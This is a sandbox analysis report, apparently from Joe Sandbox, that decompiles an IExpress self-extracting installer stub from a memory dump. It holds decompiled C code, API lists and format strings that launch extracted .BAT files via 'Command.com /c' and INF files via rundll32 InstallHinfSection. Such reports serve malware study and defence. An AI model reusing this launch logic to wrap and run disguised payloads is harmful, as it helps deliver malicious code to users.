                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-908035787
                                                                                                                                                                                                      • Opcode ID: 02e8e74fbbbc9f12da16f5f2f282545751615c078dbbeb0cd100c57ec6939a3e
                                                                                                                                                                                                      • Instruction ID: 256e7ab98321d358e73c54b97e870c62efcd1b29e905cc0a19f9e66b525899e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e8e74fbbbc9f12da16f5f2f282545751615c078dbbeb0cd100c57ec6939a3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52B192709083E19BD7339F26888976B76E8EB84750F110B29FA85DB2D0D770DD45CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 141 3e1ae8-3e1b2c call 3e1680 144 3e1b2e-3e1b39 141->144 145 3e1b3b-3e1b40 141->145 146 3e1b46-3e1b61 call 3e1a84 144->146 145->146 149 3e1b9f-3e1bc2 call 3e1781 call 3e658a 146->149 150 3e1b63-3e1b65 146->150 159 3e1bc7-3e1bd3 call 3e66c8 149->159 152 3e1b68-3e1b6d 150->152 152->152 154 3e1b6f-3e1b74 152->154 154->149 155 3e1b76-3e1b7b 154->155 157 3e1b7d-3e1b81 155->157 158 3e1b83-3e1b86 155->158 157->158 160 3e1b8c-3e1b9d call 3e1680 157->160 158->149 161 3e1b88-3e1b8a 158->161 166 3e1bd9-3e1bf1 CompareStringA 159->166 167 3e1d73-3e1d7f call 3e66c8 159->167 160->159 161->149 161->160 166->167 169 3e1bf7-3e1c07 GetFileAttributesA 166->169 174 3e1df8-3e1e09 LocalAlloc 167->174 175 3e1d81-3e1d99 CompareStringA 167->175 170 3e1c0d-3e1c15 169->170 171 3e1d53-3e1d5e 169->171 170->171 173 3e1c1b-3e1c33 call 3e1a84 170->173 176 3e1d64-3e1d6e call 3e44b9 171->176 187 3e1c35-3e1c38 173->187 188 3e1c50-3e1c61 LocalAlloc 173->188 179 3e1e0b-3e1e1b GetFileAttributesA 174->179 180 3e1dd4-3e1ddf 174->180 175->174 178 3e1d9b-3e1da2 175->178 192 3e1e94-3e1ea4 call 3e6ce0 176->192 183 3e1da5-3e1daa 178->183 184 3e1e1d-3e1e1f 179->184 185 3e1e67-3e1e73 call 3e1680 179->185 180->176 183->183 189 3e1dac-3e1db4 183->189 184->185 191 3e1e21-3e1e3e call 3e1781 184->191 198 3e1e78-3e1e84 call 3e2aac 185->198 194 3e1c3a 187->194 195 3e1c40-3e1c4b call 3e1a84 187->195 188->180 197 3e1c67-3e1c72 188->197 196 3e1db7-3e1dbc 189->196 191->198 207 3e1e40-3e1e43 191->207 194->195 195->188 196->196 202 3e1dbe-3e1dd2 LocalAlloc 196->202 203 3e1c79-3e1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->203 204 3e1c74 197->204 211 3e1e89-3e1e92 198->211 202->180 208 3e1de1-3e1df3 call 3e171e 202->208 209 3e1cf8-3e1d07 203->209 210 3e1cc2-3e1ccc 203->210 204->203 207->198 212 3e1e45-3e1e65 call 3e16b3 * 2 207->212 208->211 213 3e1d09-3e1d21 GetShortPathNameA 209->213 214 3e1d23 209->214 216 3e1cce 210->216 217 3e1cd3-3e1cf3 call 3e1680 * 2 210->217 211->192 212->198 219 3e1d28-3e1d2b 213->219 214->219 216->217 217->211 224 3e1d2d 219->224 225 3e1d32-3e1d4e call 3e171e 219->225 224->225 225->211
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E003E1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                      				_t54 = E003E1A84(_t111, _t135);
                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                      					E003E1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      					E003E658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						E003E1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                      						_t57 = E003E66C8(_t156, _t138);
                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                      							_t58 = E003E66C8(_t115, _t139);
                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                      									E003E1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                      									E003E1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                      										E003E16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                      										E003E16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = _t156;
                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                      								E003E2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                      									E003E171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                      								_t90 = E003E1A84( &_v1556, "[");
                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                      									E003E1A84( &_v1556, "]");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                      									E003E44B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0x3e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x3e1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0x3e9a34 =  *0x3e9a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0x3e9a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E003E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0x3e9a34 =  *0x3e9a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E003E1680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E003E1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E003E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x003e1af3
                                                                                                                                                                                                      0x003e1afa
                                                                                                                                                                                                      0x003e1b07
                                                                                                                                                                                                      0x003e1b09
                                                                                                                                                                                                      0x003e1b1a
                                                                                                                                                                                                      0x003e1b20
                                                                                                                                                                                                      0x003e1b2c
                                                                                                                                                                                                      0x003e1b3b
                                                                                                                                                                                                      0x003e1b40
                                                                                                                                                                                                      0x003e1b2e
                                                                                                                                                                                                      0x003e1b2e
                                                                                                                                                                                                      0x003e1b33
                                                                                                                                                                                                      0x003e1b33
                                                                                                                                                                                                      0x003e1b46
                                                                                                                                                                                                      0x003e1b4c
                                                                                                                                                                                                      0x003e1b52
                                                                                                                                                                                                      0x003e1b57
                                                                                                                                                                                                      0x003e1b5d
                                                                                                                                                                                                      0x003e1b61
                                                                                                                                                                                                      0x003e1b9f
                                                                                                                                                                                                      0x003e1b9f
                                                                                                                                                                                                      0x003e1bb1
                                                                                                                                                                                                      0x003e1bc2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1b63
                                                                                                                                                                                                      0x003e1b63
                                                                                                                                                                                                      0x003e1b65
                                                                                                                                                                                                      0x003e1b68
                                                                                                                                                                                                      0x003e1b68
                                                                                                                                                                                                      0x003e1b6a
                                                                                                                                                                                                      0x003e1b6b
                                                                                                                                                                                                      0x003e1b6f
                                                                                                                                                                                                      0x003e1b74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1b76
                                                                                                                                                                                                      0x003e1b7b
                                                                                                                                                                                                      0x003e1b86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1b8c
                                                                                                                                                                                                      0x003e1b8c
                                                                                                                                                                                                      0x003e1b98
                                                                                                                                                                                                      0x003e1bc7
                                                                                                                                                                                                      0x003e1bc9
                                                                                                                                                                                                      0x003e1bcc
                                                                                                                                                                                                      0x003e1bd3
                                                                                                                                                                                                      0x003e1d75
                                                                                                                                                                                                      0x003e1d76
                                                                                                                                                                                                      0x003e1d78
                                                                                                                                                                                                      0x003e1d7f
                                                                                                                                                                                                      0x003e1e05
                                                                                                                                                                                                      0x003e1e09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1e12
                                                                                                                                                                                                      0x003e1e1b
                                                                                                                                                                                                      0x003e1e73
                                                                                                                                                                                                      0x003e1e21
                                                                                                                                                                                                      0x003e1e21
                                                                                                                                                                                                      0x003e1e28
                                                                                                                                                                                                      0x003e1e37
                                                                                                                                                                                                      0x003e1e3e
                                                                                                                                                                                                      0x003e1e52
                                                                                                                                                                                                      0x003e1e60
                                                                                                                                                                                                      0x003e1e60
                                                                                                                                                                                                      0x003e1e3e
                                                                                                                                                                                                      0x003e1e79
                                                                                                                                                                                                      0x003e1e7b
                                                                                                                                                                                                      0x003e1e84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1d9b
                                                                                                                                                                                                      0x003e1d9b
                                                                                                                                                                                                      0x003e1da0
                                                                                                                                                                                                      0x003e1da2
                                                                                                                                                                                                      0x003e1da5
                                                                                                                                                                                                      0x003e1da5
                                                                                                                                                                                                      0x003e1da7
                                                                                                                                                                                                      0x003e1da8
                                                                                                                                                                                                      0x003e1dac
                                                                                                                                                                                                      0x003e1dae
                                                                                                                                                                                                      0x003e1db4
                                                                                                                                                                                                      0x003e1db7
                                                                                                                                                                                                      0x003e1db7
                                                                                                                                                                                                      0x003e1db9
                                                                                                                                                                                                      0x003e1dba
                                                                                                                                                                                                      0x003e1dbe
                                                                                                                                                                                                      0x003e1dc3
                                                                                                                                                                                                      0x003e1dce
                                                                                                                                                                                                      0x003e1dd2
                                                                                                                                                                                                      0x003e1deb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1df0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1dd2
                                                                                                                                                                                                      0x003e1bf7
                                                                                                                                                                                                      0x003e1bfe
                                                                                                                                                                                                      0x003e1c07
                                                                                                                                                                                                      0x003e1d55
                                                                                                                                                                                                      0x003e1d5a
                                                                                                                                                                                                      0x003e1d5b
                                                                                                                                                                                                      0x003e1d5d
                                                                                                                                                                                                      0x003e1d5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1c1b
                                                                                                                                                                                                      0x003e1c1b
                                                                                                                                                                                                      0x003e1c20
                                                                                                                                                                                                      0x003e1c2c
                                                                                                                                                                                                      0x003e1c33
                                                                                                                                                                                                      0x003e1c38
                                                                                                                                                                                                      0x003e1c3a
                                                                                                                                                                                                      0x003e1c3a
                                                                                                                                                                                                      0x003e1c40
                                                                                                                                                                                                      0x003e1c4b
                                                                                                                                                                                                      0x003e1c4b
                                                                                                                                                                                                      0x003e1c5d
                                                                                                                                                                                                      0x003e1c61
                                                                                                                                                                                                      0x003e1dd4
                                                                                                                                                                                                      0x003e1dd4
                                                                                                                                                                                                      0x003e1dd6
                                                                                                                                                                                                      0x003e1ddb
                                                                                                                                                                                                      0x003e1ddc
                                                                                                                                                                                                      0x003e1dde
                                                                                                                                                                                                      0x003e1d64
                                                                                                                                                                                                      0x003e1d64
                                                                                                                                                                                                      0x003e1d67
                                                                                                                                                                                                      0x003e1d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1c67
                                                                                                                                                                                                      0x003e1c67
                                                                                                                                                                                                      0x003e1c6d
                                                                                                                                                                                                      0x003e1c72
                                                                                                                                                                                                      0x003e1c74
                                                                                                                                                                                                      0x003e1c74
                                                                                                                                                                                                      0x003e1c8e
                                                                                                                                                                                                      0x003e1c99
                                                                                                                                                                                                      0x003e1cc0
                                                                                                                                                                                                      0x003e1cf8
                                                                                                                                                                                                      0x003e1d07
                                                                                                                                                                                                      0x003e1d23
                                                                                                                                                                                                      0x003e1d09
                                                                                                                                                                                                      0x003e1d14
                                                                                                                                                                                                      0x003e1d1b
                                                                                                                                                                                                      0x003e1d1b
                                                                                                                                                                                                      0x003e1d2b
                                                                                                                                                                                                      0x003e1d2d
                                                                                                                                                                                                      0x003e1d2d
                                                                                                                                                                                                      0x003e1d38
                                                                                                                                                                                                      0x003e1d39
                                                                                                                                                                                                      0x003e1d46
                                                                                                                                                                                                      0x003e1cc2
                                                                                                                                                                                                      0x003e1cc2
                                                                                                                                                                                                      0x003e1ccc
                                                                                                                                                                                                      0x003e1cce
                                                                                                                                                                                                      0x003e1cce
                                                                                                                                                                                                      0x003e1cdb
                                                                                                                                                                                                      0x003e1ce6
                                                                                                                                                                                                      0x003e1cee
                                                                                                                                                                                                      0x003e1cee
                                                                                                                                                                                                      0x003e1e89
                                                                                                                                                                                                      0x003e1e91
                                                                                                                                                                                                      0x003e1e92
                                                                                                                                                                                                      0x003e1e94
                                                                                                                                                                                                      0x003e1e97
                                                                                                                                                                                                      0x003e1ea4
                                                                                                                                                                                                      0x003e1ea4
                                                                                                                                                                                                      0x003e1c61
                                                                                                                                                                                                      0x003e1c07
                                                                                                                                                                                                      0x003e1bd3
                                                                                                                                                                                                      0x003e1b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 003E1C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,003E1140,00000000,00000008,?), ref: 003E1CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 003E1D1B
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-2869639027
                                                                                                                                                                                                      • Opcode ID: 6d9d29929969a073433117b07272e681c7e1329286ff6ffa06898521a7a0de26
                                                                                                                                                                                                      • Instruction ID: 391c7d99f2b0fd249f8f287a409745d1434dcc19ce1c24824f6bd796693b34f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d9d29929969a073433117b07272e681c7e1329286ff6ffa06898521a7a0de26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03A13671A002F86BEF239B26CC45BFA77699B95310F1403A9F555AB2C0DBB09E85CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 450 3e2f1d-3e2f3d 451 3e2f3f-3e2f46 450->451 452 3e2f6c-3e2f73 call 3e5164 450->452 454 3e2f5f-3e2f66 call 3e3a3f 451->454 455 3e2f48 call 3e51e5 451->455 461 3e2f79-3e2f80 call 3e55a0 452->461 462 3e3041 452->462 454->452 454->462 459 3e2f4d-3e2f4f 455->459 459->462 464 3e2f55-3e2f5d 459->464 461->462 469 3e2f86-3e2fbe GetSystemDirectoryA call 3e658a LoadLibraryA 461->469 463 3e3043-3e3053 call 3e6ce0 462->463 464->452 464->454 472 3e2ff7-3e3004 FreeLibrary 469->472 473 3e2fc0-3e2fd4 GetProcAddress 469->473 475 3e3006-3e300c 472->475 476 3e3017-3e3024 SetCurrentDirectoryA 472->476 473->472 474 3e2fd6-3e2fee DecryptFileA 473->474 474->472 485 3e2ff0-3e2ff5 474->485 475->476 477 3e300e call 3e621e 475->477 478 3e3026-3e303c call 3e44b9 call 3e6285 476->478 479 3e3054-3e305a 476->479 489 3e3013-3e3015 477->489 478->462 481 3e305c call 3e3b26 479->481 482 3e3065-3e306c 479->482 491 3e3061-3e3063 481->491 487 3e306e-3e3075 call 3e256d 482->487 488 3e307c-3e3089 482->488 485->472 498 3e307a 487->498 493 3e308b-3e3091 488->493 494 3e30a1-3e30a9 488->494 489->462 489->476 491->462 491->482 493->494 499 3e3093 call 3e3ba2 493->499 496 3e30ab-3e30ad 494->496 497 3e30b4-3e30b7 494->497 496->497 501 3e30af call 3e4169 496->501 497->463 498->488 504 3e3098-3e309a 499->504 501->497 504->462 505 3e309c 504->505 505->494
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
